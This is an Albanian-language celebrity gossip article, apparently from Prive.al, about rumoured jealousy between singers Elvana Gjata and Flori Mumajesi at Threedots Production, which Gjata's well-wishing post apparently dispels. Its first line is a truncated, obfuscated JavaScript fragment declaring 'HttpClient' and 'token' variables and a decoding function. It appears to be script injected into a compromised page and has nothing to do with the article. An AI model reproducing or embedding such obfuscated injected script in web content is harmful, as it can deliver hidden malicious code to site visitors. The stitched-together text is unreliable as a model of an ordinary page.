;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Krizë e xhelozi në Threedots?! Elvana s’i lë hapësirë fjalëve!

By

Si asnjëherë më parë, së fundmi produksioni muzikor tejet i suksesshëm ‘Threedots Production’ ka qenë në qendër të vëmendjes për relacionet brenda artistëve.

Një ftohje u raportua nga mediat shqiptare në relacionin mes Flori Mumajesit dhe Elvana Gjatës, bashkëpunëtorë e miq prej shumë vitesh.

Tendenca shkoi aq larg saqë bashkëpunimi i Tunës dhe Florit për baladën ‘Duam’ u interpretua si një tendencë për të zëvendësuar Elvanën teksa benzinë zjarrit i shtonte edhe Flori me një varg postimesh ku fliste për tradhëtinë, ndarjen, miq të pabesë e zhgënjim.

Por, nga tani e tutje s’besojmë se ka hapësirë për dilema të tjera.

Kjo për faktin se ka qenë vetë Elvana Gjata që ka vulosur cdo gjë përmes një postimi në rrjete sociale ku produkteve të Threedots i ka uruar fat. 

‘Uroj mbrëmja të shkëlqej për ju sonte’ – ka qenë mbishkrimi i Elvanës që nuk ka ndarë të pestë garuesit në përmbledhjen e fotografive të ripostuar nga Threedots.

Gjërat duket se vazhdojnë normalisht, përkundër thashethemeve. /Prive.al/

Artikuj të ngjashëm